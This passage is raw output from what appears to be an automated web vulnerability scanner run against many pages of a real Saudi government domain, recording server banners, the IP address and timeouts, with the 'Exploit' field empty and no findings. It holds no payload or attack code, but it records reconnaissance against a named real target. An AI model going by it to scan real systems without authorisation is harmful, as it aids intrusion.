  714. |_[ + ] More details:: / - / , ISP:
  715. |_[ + ] Found:: UNIDENTIFIED
  716. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 out of 0 bytes received
  717.  
  718. _[ - ]::--------------------------------------------------------------------------------------------------------------
  719. |_[ + ] [ 13 / 100 ]-[15:14:36] [ - ]
  720. |_[ + ] Target:: [ https://gip.gov.sa/vision.html ]
  721. |_[ + ] Exploit::
  722. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  723. |_[ + ] More details:: / - / , ISP:
  724. |_[ + ] Found:: UNIDENTIFIED
  725. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  726.  
  727. _[ - ]::--------------------------------------------------------------------------------------------------------------
  728. |_[ + ] [ 14 / 100 ]-[15:14:42] [ - ]
  729. |_[ + ] Target:: [ https://gip.gov.sa/contactus.html ]
  730. |_[ + ] Exploit::
  731. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  732. |_[ + ] More details:: / - / , ISP:
  733. |_[ + ] Found:: UNIDENTIFIED
  734. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  735.  
  736. _[ - ]::--------------------------------------------------------------------------------------------------------------
  737. |_[ + ] [ 15 / 100 ]-[15:14:47] [ - ]
  738. |_[ + ] Target:: [ https://gip.gov.sa/news10.html ]
  739. |_[ + ] Exploit::
  740. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  741. |_[ + ] More details:: / - / , ISP:
  742. |_[ + ] Found:: UNIDENTIFIED
  743. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  744.  
  745. _[ - ]::--------------------------------------------------------------------------------------------------------------
  746. |_[ + ] [ 16 / 100 ]-[15:14:53] [ - ]
  747. |_[ + ] Target:: [ https://gip.gov.sa/news6.html ]
  748. |_[ + ] Exploit::
  749. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  750. |_[ + ] More details:: / - / , ISP:
  751. |_[ + ] Found:: UNIDENTIFIED
  752. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  753.  
  754. _[ - ]::--------------------------------------------------------------------------------------------------------------
  755. |_[ + ] [ 17 / 100 ]-[15:14:59] [ - ]
  756. |_[ + ] Target:: [ https://www.gip.gov.sa/sites/english/ ]
  757. |_[ + ] Exploit::
  758. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  759. |_[ + ] More details:: / - / , ISP:
  760. |_[ + ] Found:: UNIDENTIFIED
  761. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  762.  
  763. _[ - ]::--------------------------------------------------------------------------------------------------------------
  764. |_[ + ] [ 18 / 100 ]-[15:15:05] [ - ]
  765. |_[ + ] Target:: [ https://www.gip.gov.sa/sitemap.xml ]
  766. |_[ + ] Exploit::
  767. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  768. |_[ + ] More details:: / - / , ISP:
  769. |_[ + ] Found:: UNIDENTIFIED
  770.  
  771. _[ - ]::--------------------------------------------------------------------------------------------------------------
  772. |_[ + ] [ 19 / 100 ]-[15:15:11] [ - ]
  773. |_[ + ] Target:: [ https://gip.gov.sa/president.html ]
  774. |_[ + ] Exploit::
  775. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  776. |_[ + ] More details:: / - / , ISP:
  777. |_[ + ] Found:: UNIDENTIFIED
  778.  
  779. _[ - ]::--------------------------------------------------------------------------------------------------------------
  780. |_[ + ] [ 20 / 100 ]-[15:15:16] [ - ]
  781. |_[ + ] Target:: [ https://www.gip.gov.sa/news4.html ]
  782. |_[ + ] Exploit::
  783. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  784. |_[ + ] More details:: / - / , ISP:
  785. |_[ + ] Found:: UNIDENTIFIED
  786.  
  787. _[ - ]::--------------------------------------------------------------------------------------------------------------
  788. |_[ + ] [ 21 / 100 ]-[15:15:22] [ - ]
  789. |_[ + ] Target:: [ https://gip.gov.sa/news13.html ]
  790. |_[ + ] Exploit::
  791. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  792. |_[ + ] More details:: / - / , ISP:
  793. |_[ + ] Found:: UNIDENTIFIED
  794. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 out of 0 bytes received
  795.  
  796. _[ - ]::--------------------------------------------------------------------------------------------------------------
  797. |_[ + ] [ 22 / 100 ]-[15:15:28] [ - ]
  798. |_[ + ] Target:: [ https://gip.gov.sa/home.html ]
  799. |_[ + ] Exploit::
  800. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  801. |_[ + ] More details:: / - / , ISP:
  802. |_[ + ] Found:: UNIDENTIFIED
  803.  
  804. _[ - ]::--------------------------------------------------------------------------------------------------------------
  805. |_[ + ] [ 23 / 100 ]-[15:15:33] [ - ]
  806. |_[ + ] Target:: [ https://www.gip.gov.sa/news11.html ]
  807. |_[ + ] Exploit::
  808. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  809. |_[ + ] More details:: / - / , ISP:
  810. |_[ + ] Found:: UNIDENTIFIED
  811.  
  812. _[ - ]::--------------------------------------------------------------------------------------------------------------
  813. |_[ + ] [ 24 / 100 ]-[15:15:39] [ - ]
  814. |_[ + ] Target:: [ https://www.gip.gov.sa/News/PublishingImages/ ]
  815. |_[ + ] Exploit::
  816. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  817. |_[ + ] More details:: / - / , ISP:
  818. |_[ + ] Found:: UNIDENTIFIED
  819. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 out of 0 bytes received
  820.  
  821. _[ - ]::--------------------------------------------------------------------------------------------------------------
  822. |_[ + ] [ 25 / 100 ]-[15:15:44] [ - ]
  823. |_[ + ] Target:: [ https://www.gip.gov.sa/careers.html ]
  824. |_[ + ] Exploit::
  825. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  826. |_[ + ] More details:: / - / , ISP:
  827. |_[ + ] Found:: UNIDENTIFIED
  828.  
  829. _[ - ]::--------------------------------------------------------------------------------------------------------------
  830. |_[ + ] [ 26 / 100 ]-[15:15:50] [ - ]
  831. |_[ + ] Target:: [ https://gip.gov.sa/news12.html ]
  832. |_[ + ] Exploit::
  833. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  834. |_[ + ] More details:: / - / , ISP:
  835. |_[ + ] Found:: UNIDENTIFIED
  836. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  837.  
  838. _[ - ]::--------------------------------------------------------------------------------------------------------------
  839. |_[ + ] [ 27 / 100 ]-[15:15:56] [ - ]
  840. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/fUZ6Zb9F ]
  841. |_[ + ] Exploit::
  842. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  843. |_[ + ] More details:: / - / , ISP:
  844. |_[ + ] Found:: UNIDENTIFIED
  845. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 out of 0 bytes received
  846.  
  847. _[ - ]::--------------------------------------------------------------------------------------------------------------
  848. |_[ + ] [ 28 / 100 ]-[15:16:02] [ - ]
  849. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/F6qPrwYM ]
  850. |_[ + ] Exploit::
  851. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  852. |_[ + ] More details:: / - / , ISP:
  853. |_[ + ] Found:: UNIDENTIFIED
  854. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  855.  
  856. _[ - ]::--------------------------------------------------------------------------------------------------------------
  857. |_[ + ] [ 29 / 100 ]-[15:16:08] [ - ]
  858. |_[ + ] Target:: [ https://www.gip.gov.sa/Home/Page/AboutKSA ]
  859. |_[ + ] Exploit::
  860. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  861. |_[ + ] More details:: / - / , ISP:
  862. |_[ + ] Found:: UNIDENTIFIED
  863. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  864.  
  865. _[ - ]::--------------------------------------------------------------------------------------------------------------
  866. |_[ + ] [ 30 / 100 ]-[15:16:14] [ - ]
  867. |_[ + ] Target:: [ https://www.gip.gov.sa/Home/Page/Careers ]
  868. |_[ + ] Exploit::
  869. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  870. |_[ + ] More details:: / - / , ISP:
  871. |_[ + ] Found:: UNIDENTIFIED
  872. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  873.  
  874. _[ - ]::--------------------------------------------------------------------------------------------------------------
  875. |_[ + ] [ 31 / 100 ]-[15:16:20] [ - ]
  876. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/3soKdtXH ]
  877. |_[ + ] Exploit::
  878. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  879. |_[ + ] More details:: / - / , ISP:
  880. |_[ + ] Found:: UNIDENTIFIED
  881. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  882.  
  883. _[ - ]::--------------------------------------------------------------------------------------------------------------
  884. |_[ + ] [ 32 / 100 ]-[15:16:26] [ - ]
  885. |_[ + ] Target:: [ https://www.gip.gov.sa/Home/Page/Leaders ]
  886. |_[ + ] Exploit::
  887. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  888. |_[ + ] More details:: / - / , ISP:
  889. |_[ + ] Found:: UNIDENTIFIED
  890. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  891.  
  892. _[ - ]::--------------------------------------------------------------------------------------------------------------
  893. |_[ + ] [ 33 / 100 ]-[15:16:32] [ - ]
  894. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/OsU987Rg ]
  895. |_[ + ] Exploit::
  896. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  897. |_[ + ] More details:: / - / , ISP:
  898. |_[ + ] Found:: UNIDENTIFIED
  899. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  900.  
  901. _[ - ]::--------------------------------------------------------------------------------------------------------------
  902. |_[ + ] [ 34 / 100 ]-[15:16:38] [ - ]
  903. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/Wpj2jZ6X ]
  904. |_[ + ] Exploit::
  905. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  906. |_[ + ] More details:: / - / , ISP:
  907. |_[ + ] Found:: UNIDENTIFIED
  908. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  909.  
  910. _[ - ]::--------------------------------------------------------------------------------------------------------------
  911. |_[ + ] [ 35 / 100 ]-[15:16:44] [ - ]
  912. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/iTZotQqd ]
  913. |_[ + ] Exploit::
  914. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  915. |_[ + ] More details:: / - / , ISP:
  916. |_[ + ] Found:: UNIDENTIFIED
  917. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  918.  
  919. _[ - ]::--------------------------------------------------------------------------------------------------------------
  920. |_[ + ] [ 36 / 100 ]-[15:16:50] [ - ]
  921. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/ckHVcyBG ]
  922. |_[ + ] Exploit::
  923. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  924. |_[ + ] More details:: / - / , ISP:
  925. |_[ + ] Found:: UNIDENTIFIED
  926. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  927.  
  928. _[ - ]::--------------------------------------------------------------------------------------------------------------
  929. |_[ + ] [ 37 / 100 ]-[15:16:56] [ - ]
  930. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/7He4DjCJ ]
  931. |_[ + ] Exploit::
  932. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  933. |_[ + ] More details:: / - / , ISP:
  934. |_[ + ] Found:: UNIDENTIFIED
  935. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  936.  
  937. _[ - ]::--------------------------------------------------------------------------------------------------------------
  938. |_[ + ] [ 38 / 100 ]-[15:17:02] [ - ]
  939. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/IteW3Djf ]
  940. |_[ + ] Exploit::
  941. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  942. |_[ + ] More details:: / - / , ISP:
  943. |_[ + ] Found:: UNIDENTIFIED
  944. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 out of 0 bytes received
  945.  
  946. _[ - ]::--------------------------------------------------------------------------------------------------------------
  947. |_[ + ] [ 39 / 100 ]-[15:17:08] [ - ]
  948. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/mZJfQez2 ]
  949. |_[ + ] Exploit::
  950. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  951. |_[ + ] More details:: / - / , ISP:
  952. |_[ + ] Found:: UNIDENTIFIED
  953. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  954.  
  955. _[ - ]::--------------------------------------------------------------------------------------------------------------
  956. |_[ + ] [ 40 / 100 ]-[15:17:13] [ - ]
  957. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/vixxEwMZ ]
  958. |_[ + ] Exploit::
  959. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  960. |_[ + ] More details:: / - / , ISP:
  961. |_[ + ] Found:: UNIDENTIFIED
  962. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  963.  
  964. _[ - ]::--------------------------------------------------------------------------------------------------------------
  965. |_[ + ] [ 41 / 100 ]-[15:17:19] [ - ]
  966. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/wnihj67P ]
  967. |_[ + ] Exploit::
  968. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  969. |_[ + ] More details:: / - / , ISP:
  970. |_[ + ] Found:: UNIDENTIFIED
  971. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  972.  
  973. _[ - ]::--------------------------------------------------------------------------------------------------------------
  974. |_[ + ] [ 42 / 100 ]-[15:17:25] [ - ]
  975. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/XkYAMqzD ]
  976. |_[ + ] Exploit::
  977. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  978. |_[ + ] More details:: / - / , ISP:
  979. |_[ + ] Found:: UNIDENTIFIED
  980. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  981.  
  982. _[ - ]::--------------------------------------------------------------------------------------------------------------
  983. |_[ + ] [ 43 / 100 ]-[15:17:32] [ - ]
  984. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/V5GgwXiq ]
  985. |_[ + ] Exploit::
  986. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  987. |_[ + ] More details:: / - / , ISP:
  988. |_[ + ] Found:: UNIDENTIFIED
  989. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  990.  
  991. _[ - ]::--------------------------------------------------------------------------------------------------------------
  992. |_[ + ] [ 44 / 100 ]-[15:17:38] [ - ]
  993. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/RzjbOMeN ]
  994. |_[ + ] Exploit::
  995. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  996. |_[ + ] More details:: / - / , ISP:
  997. |_[ + ] Found:: UNIDENTIFIED
  998. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 out of 0 bytes received
  999.  
  1000. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1001. |_[ + ] [ 45 / 100 ]-[15:17:44] [ - ]
  1002. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/5rTcROks ]
  1003. |_[ + ] Exploit::
  1004. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1005. |_[ + ] More details:: / - / , ISP:
  1006. |_[ + ] Found:: UNIDENTIFIED
  1007. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1008.  
  1009. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1010. |_[ + ] [ 46 / 100 ]-[15:17:50] [ - ]
  1011. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/dWcJfASQ ]
  1012. |_[ + ] Exploit::
  1013. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1014. |_[ + ] More details:: / - / , ISP:
  1015. |_[ + ] Found:: UNIDENTIFIED
  1016. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1017.  
  1018. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1019. |_[ + ] [ 47 / 100 ]-[15:17:56] [ - ]
  1020. |_[ + ] Target:: [ https://www.gip.gov.sa/Home/Page/President ]
  1021. |_[ + ] Exploit::
  1022. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1023. |_[ + ] More details:: / - / , ISP:
  1024. |_[ + ] Found:: UNIDENTIFIED
  1025.  
  1026. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1027. |_[ + ] [ 48 / 100 ]-[15:18:01] [ - ]
  1028. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/gQnOrwFf ]
  1029. |_[ + ] Exploit::
  1030. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1031. |_[ + ] More details:: / - / , ISP:
  1032. |_[ + ] Found:: UNIDENTIFIED
  1033.  
  1034. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1035. |_[ + ] [ 49 / 100 ]-[15:18:07] [ - ]
  1036. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/hEbmtEMG ]
  1037. |_[ + ] Exploit::
  1038. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1039. |_[ + ] More details:: / - / , ISP:
  1040. |_[ + ] Found:: UNIDENTIFIED
  1041. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1042.  
  1043. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1044. |_[ + ] [ 50 / 100 ]-[15:18:13] [ - ]
  1045. |_[ + ] Target:: [ https://www.gip.gov.sa/News/Read/96yg549U ]
  1046. |_[ + ] Exploit::
  1047. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1048. |_[ + ] More details:: / - / , ISP:
  1049. |_[ + ] Found:: UNIDENTIFIED
  1050. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1051.  
  1052. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1053. |_[ + ] [ 51 / 100 ]-[15:18:18] [ - ]
  1054. |_[ + ] Target:: [ https://www.gip.gov.sa/JobApplication...default ]
  1055. |_[ + ] Exploit::
  1056. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1057. |_[ + ] More details:: / - / , ISP:
  1058. |_[ + ] Found:: UNIDENTIFIED
  1059.  
  1060. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1061. |_[ + ] [ 52 / 100 ]-[15:18:24] [ - ]
  1062. |_[ + ] Target:: [ https://gip.gov.sa/Pages/loginpage.aspx ]
  1063. |_[ + ] Exploit::
  1064. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1065. |_[ + ] More details:: / - / , ISP:
  1066. |_[ + ] Found:: UNIDENTIFIED
  1067. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1068.  
  1069. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1070. |_[ + ] [ 53 / 100 ]-[15:18:28] [ - ]
  1071. |_[ + ] Target:: [ https://www.gip.gov.sa/sites/english/AboutPresidency ]
  1072. |_[ + ] Exploit::
  1073. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1074. |_[ + ] More details:: / - / , ISP:
  1075. |_[ + ] Found:: UNIDENTIFIED
  1076.  
  1077. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1078. |_[ + ] [ 54 / 100 ]-[15:18:33] [ - ]
  1079. |_[ + ] Target:: [ https://gip.gov.sa/en/news2.html ]
  1080. |_[ + ] Exploit::
  1081. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1082. |_[ + ] More details:: / - / , ISP:
  1083. |_[ + ] Found:: UNIDENTIFIED
  1084.  
  1085. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1086. |_[ + ] [ 55 / 100 ]-[15:18:39] [ - ]
  1087. |_[ + ] Target:: [ https://www.gip.gov.sa/forms/2.pdf ]
  1088. |_[ + ] Exploit::
  1089. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1090. |_[ + ] More details:: / - / , ISP:
  1091. |_[ + ] Found:: UNIDENTIFIED
  1092. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1093.  
  1094. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1095. |_[ + ] [ 56 / 100 ]-[15:18:45] [ - ]
  1096. |_[ + ] Target:: [ https://gip.gov.sa/en/news4.html ]
  1097. |_[ + ] Exploit::
  1098. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1099. |_[ + ] More details:: / - / , ISP:
  1100. |_[ + ] Found:: UNIDENTIFIED
  1101. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1102.  
  1103. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1104. |_[ + ] [ 57 / 100 ]-[15:18:51] [ - ]
  1105. |_[ + ] Target:: [ https://gip.gov.sa/en/contactus.html ]
  1106. |_[ + ] Exploit::
  1107. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1108. |_[ + ] More details:: / - / , ISP:
  1109. |_[ + ] Found:: UNIDENTIFIED
  1110. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1111.  
  1112. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1113. |_[ + ] [ 58 / 100 ]-[15:18:57] [ - ]
  1114. |_[ + ] Target:: [ https://www.gip.gov.sa/Home/ChangeLanguage/2 ]
  1115. |_[ + ] Exploit::
  1116. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1117. |_[ + ] More details:: / - / , ISP:
  1118. |_[ + ] Found:: UNIDENTIFIED
  1119. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1120.  
  1121. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1122. |_[ + ] [ 59 / 100 ]-[15:19:03] [ - ]
  1123. |_[ + ] Target:: [ https://www.gip.gov.sa/en/home.html ]
  1124. |_[ + ] Exploit::
  1125. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1126. |_[ + ] More details:: / - / , ISP:
  1127. |_[ + ] Found:: UNIDENTIFIED
  1128. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1129.  
  1130. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1131. |_[ + ] [ 60 / 100 ]-[15:19:08] [ - ]
  1132. |_[ + ] Target:: [ https://www.gip.gov.sa/en/news12.html ]
  1133. |_[ + ] Exploit::
  1134. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1135. |_[ + ] More details:: / - / , ISP:
  1136. |_[ + ] Found:: UNIDENTIFIED
  1137.  
  1138. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1139. |_[ + ] [ 61 / 100 ]-[15:19:13] [ - ]
  1140. |_[ + ] Target:: [ https://gip.gov.sa/en/leaders.html ]
  1141. |_[ + ] Exploit::
  1142. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1143. |_[ + ] More details:: / - / , ISP:
  1144. |_[ + ] Found:: UNIDENTIFIED
  1145.  
  1146. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1147. |_[ + ] [ 62 / 100 ]-[15:19:19] [ - ]
  1148. |_[ + ] Target:: [ https://www.gip.gov.sa/Pages/Home.as ]
  1149. |_[ + ] Exploit::
  1150. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1151. |_[ + ] More details:: / - / , ISP:
  1152. |_[ + ] Found:: UNIDENTIFIED
  1153.  
  1154. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1155. |_[ + ] [ 63 / 100 ]-[15:19:24] [ - ]
  1156. |_[ + ] Target:: [ https://gip.gov.sa/Pages/JobAds.aspx ]
  1157. |_[ + ] Exploit::
  1158. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1159. |_[ + ] More details:: / - / , ISP:
  1160. |_[ + ] Found:: UNIDENTIFIED
  1161. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1162.  
  1163. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1164. |_[ + ] [ 64 / 100 ]-[15:19:30] [ - ]
  1165. |_[ + ] Target:: [ https://www.gip.gov.sa/Home/Page/Mission ]
  1166. |_[ + ] Exploit::
  1167. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1168. |_[ + ] More details:: / - / , ISP:
  1169. |_[ + ] Found:: UNIDENTIFIED
  1170. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1171.  
  1172. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1173. |_[ + ] [ 65 / 100 ]-[15:19:37] [ - ]
  1174. |_[ + ] Target:: [ https://gip.gov.sa/en/careers.html ]
  1175. |_[ + ] Exploit::
  1176. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1177. |_[ + ] More details:: / - / , ISP:
  1178. |_[ + ] Found:: UNIDENTIFIED
  1179. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 out of 0 bytes received
  1180.  
  1181. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1182. |_[ + ] [ 66 / 100 ]-[15:19:42] [ - ]
  1183. |_[ + ] Target:: [ https://www.gip.gov.sa/en/mission.html ]
  1184. |_[ + ] Exploit::
  1185. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1186. |_[ + ] More details:: / - / , ISP:
  1187. |_[ + ] Found:: UNIDENTIFIED
  1188.  
  1189. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1190. |_[ + ] [ 67 / 100 ]-[15:19:48] [ - ]
  1191. |_[ + ] Target:: [ https://www.gip.gov.sa/en/president.html ]
  1192. |_[ + ] Exploit::
  1193. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1194. |_[ + ] More details:: / - / , ISP:
  1195. |_[ + ] Found:: UNIDENTIFIED
  1196. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1197.  
  1198. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1199. |_[ + ] [ 68 / 100 ]-[15:19:54] [ - ]
  1200. |_[ + ] Target:: [ https://www.gip.gov.sa/Pages/عنالرئاسة.aspx ]
  1201. |_[ + ] Exploit::
  1202. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1203. |_[ + ] More details:: / - / , ISP:
  1204. |_[ + ] Found:: UNIDENTIFIED
  1205. |_[ + ] ERROR CONECTION:: Operation timed out after 5002 milliseconds with 0 out of 0 bytes received
  1206.  
  1207. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1208. |_[ + ] [ 69 / 100 ]-[15:20:00] [ - ]
  1209. |_[ + ] Target:: [ https://gip.gov.sa/en/news3.html ]
  1210. |_[ + ] Exploit::
  1211. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET, IP:212.138.117.71:443
  1212. |_[ + ] More details:: / - / , ISP:
  1213. |_[ + ] Found:: UNIDENTIFIED
  1214.  
  1215. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1216. |_[ + ] [ 70 / 100 ]-[15:20:06] [ - ]
  1217. |_[ + ] Target:: [ https://gip.gov.sa/Search/advanced.aspx ]
  1218. |_[ + ] Exploit::
  1219. |_[ + ] Information Server:: , , IP:212.138.117.71:443
  1220. |_[ + ] More details:: / - / , ISP:
  1221. |_[ + ] Found:: UNIDENTIFIED
  1222. |_[ + ] ERROR CONECTION:: Operation timed out after 5000 milliseconds with 0 bytes received
  1223.  
  1224. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1225. |_[ + ] [ 71 / 100 ]-[15:20:10] [ - ]
